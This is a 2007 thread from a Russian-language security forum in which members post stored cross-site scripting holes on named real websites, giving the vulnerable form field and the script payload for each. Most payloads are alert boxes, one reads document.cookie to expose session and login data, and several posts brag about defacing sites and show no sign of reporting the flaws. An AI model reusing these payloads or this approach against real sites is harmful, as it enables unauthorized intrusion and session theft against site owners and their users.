ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 02.04.2007, 21:55
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

splashblog.com

Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:"

Код:
"><script>alert();</script>
Работает в ие и опере.
 
Ответить с цитированием

  #12  
Старый 03.04.2007, 18:18
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

http://rock-rus.com.ru/users.php

в регистрации пишем мыло
Код:
blblbl@hek.cc"><script>alert('alert')</script>
 
Ответить с цитированием

  #13  
Старый 04.04.2007, 22:07
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

icq.com

Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..."
Код:
<script>alert(1);</script>
Получилось голосование и теперь, когда кто-либо будет голосовать за пункт с алертом - то будут выскакивать все алерты (дапустим вы поставили алерты на все ансверы)))

Работает в ие и опере.

Последний раз редактировалось freddi; 04.04.2007 в 22:15..
 
Ответить с цитированием

  #14  
Старый 05.04.2007, 23:13
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

meta.ua

Идем в блог, создаем комментарий
Код:
<script>alert(10);</script>
и при ответе на этот коментарий вылезает алерт.

Работает в ие и опере.
 
Ответить с цитированием

  #15  
Старый 05.04.2007, 23:22
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

comby.ru


Везде где можно оставить комментарий:
Код:
<img src=javascript:alert()>
вылезет алерт.

Работает в ие и опере.

Последний раз редактировалось freddi; 05.04.2007 в 23:27..
 
Ответить с цитированием

  #16  
Старый 06.04.2007, 15:49
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

http://planeta.solo.by/- геймерский сайт провайдера.

В личку написать:

<img src=fuck onerror=alert(\'xss\')
 
Ответить с цитированием

  #17  
Старый 07.04.2007, 11:01
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
По умолчанию

tForum <= b0.915
Форум малораспространённый, но всё же.

Активная XSS в поле "Message".

Код:
http://www.target/path/message.php
Вставляем в поле "Message":

Код:
[img]javascript:alert(document.cookie)[/img]
В кукисах сессия, логин.
 
Ответить с цитированием

  #18  
Старый 08.04.2007, 11:36
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Отморозки

=============
Otmorozki.org
=============
Заходим в любую новость пишем комментарий...
Уязвимое поле "тема" ..вот там и пишем наш кодик..
Код:
"><script>alert("Отморозки вас похекале")</script>
Теперь ваша уязвимость ( xss ) будет гулять везде))Даже на главной странице
 
Ответить с цитированием

  #19  
Старый 08.04.2007, 11:39
[loy]
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
Провел на форуме:
344009

Репутация: 72
По умолчанию

жесть,зачод
 
Ответить с цитированием

  #20  
Старый 08.04.2007, 11:51
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

Warcraft

=============
Games.mipt.ru/wc3/
=============

Уязвимые поля при регистрации:
"Полное имя"
"О пользователе"
"Дом.страница"

Вставляем туда код
Код:
"><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>
И вот пример.....просмотр моего профиля
Isis
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ